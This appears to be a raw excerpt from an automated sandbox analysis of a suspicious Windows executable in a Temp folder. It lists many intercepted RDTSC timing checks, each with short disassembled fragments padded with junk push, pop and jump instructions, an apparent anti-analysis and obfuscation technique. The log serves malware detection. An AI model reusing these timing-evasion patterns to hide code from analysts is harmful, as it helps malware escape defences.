Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C28C second address: 93C2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD90h 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FEE851EFD88h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2B3 second address: 93C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2C6 second address: 93C2CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2CC second address: 93C2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2D5 second address: 93C2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C6E0 second address: 93C718 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FEE84E88FCAh 0x0000000c pushad 0x0000000d jne 00007FEE84E88FC6h 0x00000013 jnp 00007FEE84E88FC6h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c jmp 00007FEE84E88FCCh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 jp 00007FEE84E88FC6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C718 second address: 93C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942811 second address: 94281B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94281B second address: 942821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942821 second address: 942825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941259 second address: 94129C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEE851EFD98h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FEE851EFD97h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 jno 00007FEE851EFD86h 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413C8 second address: 9413CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413CC second address: 9413D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9413D2 second address: 9413D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941529 second address: 94153F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ch 0x00000007 jnl 00007FEE851EFD86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94153F second address: 941566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE84E88FCDh 0x00000008 jne 00007FEE84E88FC6h 0x0000000e jns 00007FEE84E88FC6h 0x00000014 jng 00007FEE84E88FC6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941566 second address: 94156A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94156A second address: 94156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9416E3 second address: 9416FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941832 second address: 94183F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FEE84E88FC8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94183F second address: 941845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9419D0 second address: 9419E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941B09 second address: 941B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD8Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 941F03 second address: 941F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94206F second address: 942077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942077 second address: 94207B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9421E4 second address: 9421EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 949E40 second address: 949E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b js 00007FEE84E88FC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94D1E0 second address: 94D1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94CD47 second address: 94CD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 953CB8 second address: 953CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9526ED second address: 9526FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FEE84E88FC6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9526FC second address: 952721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FEE851EFD86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952721 second address: 95273B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEE84E88FC6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FEE84E88FC8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952E00 second address: 952E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 952F47 second address: 952F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95730F second address: 957334 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEE851EFD88h 0x00000008 push ebx 0x00000009 jbe 00007FEE851EFD86h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jg 00007FEE851EFD88h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jnl 00007FEE851EFD9Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 957334 second address: 957355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 jmp 00007FEE84E88FCAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 957355 second address: 95735B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95735B second address: 95735F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B50D second address: 95B520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 jmp 00007FEE851EFD8Bh 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B520 second address: 95B53D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FEE84E88FCFh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B53D second address: 95B55A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE851EFD97h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 95B55A second address: 95B564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621DD second address: 9621F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE851EFD91h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621F7 second address: 9621FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9621FD second address: 962204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962204 second address: 96220C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96220C second address: 962210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962A92 second address: 962A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962A96 second address: 962AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FEE851EFD98h 0x0000000f jmp 00007FEE851EFD8Fh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962D8F second address: 962D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962D93 second address: 962DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 962DA0 second address: 962DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEE84E88FC6h 0x0000000a jc 00007FEE84E88FC6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963077 second address: 96307C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96307C second address: 9630A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b js 00007FEE84E88FC6h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FEE84E88FCEh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963372 second address: 963377 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963377 second address: 96338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FEE84E88FE7h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96338A second address: 96338E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963654 second address: 963659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963C24 second address: 963C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 963C28 second address: 963C32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B8D second address: 968B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE851EFD86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B99 second address: 968B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 968B9D second address: 968BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FEE851EFD86h 0x00000011 jc 00007FEE851EFD86h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDEA second address: 96CDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDF0 second address: 96CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CDF4 second address: 96CE21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FEE84E88FC6h 0x0000000d pop edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FEE84E88FD6h 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CE21 second address: 96CE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FEE851EFD88h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96CE34 second address: 96CE3E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE84E88FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0F1 second address: 96C0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0F5 second address: 96C0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C0FB second address: 96C107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE851EFD86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C107 second address: 96C10B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C423 second address: 96C427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C427 second address: 96C42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C42D second address: 96C437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C58E second address: 96C5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD1h 0x00000009 jp 00007FEE84E88FCCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C5AF second address: 96C5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C5B5 second address: 96C5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C6FB second address: 96C715 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE851EFD86h 0x00000008 je 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FEE851EFD86h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 96C9E7 second address: 96C9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FEE84E88FC6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8B57A4 second address: 8B57B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FEE851EFD86h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974A49 second address: 974A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974A4D second address: 974A64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEE851EFD8Ch 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974D2C second address: 974D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 974D32 second address: 974D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE851EFD92h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9753FC second address: 975417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975417 second address: 97541C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 97541C second address: 975421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 975421 second address: 97543D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FEE851EFDACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE851EFD8Bh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9756C9 second address: 9756DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FEE84E88FCCh 0x0000000b jno 00007FEE84E88FC6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9756DA second address: 9756E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
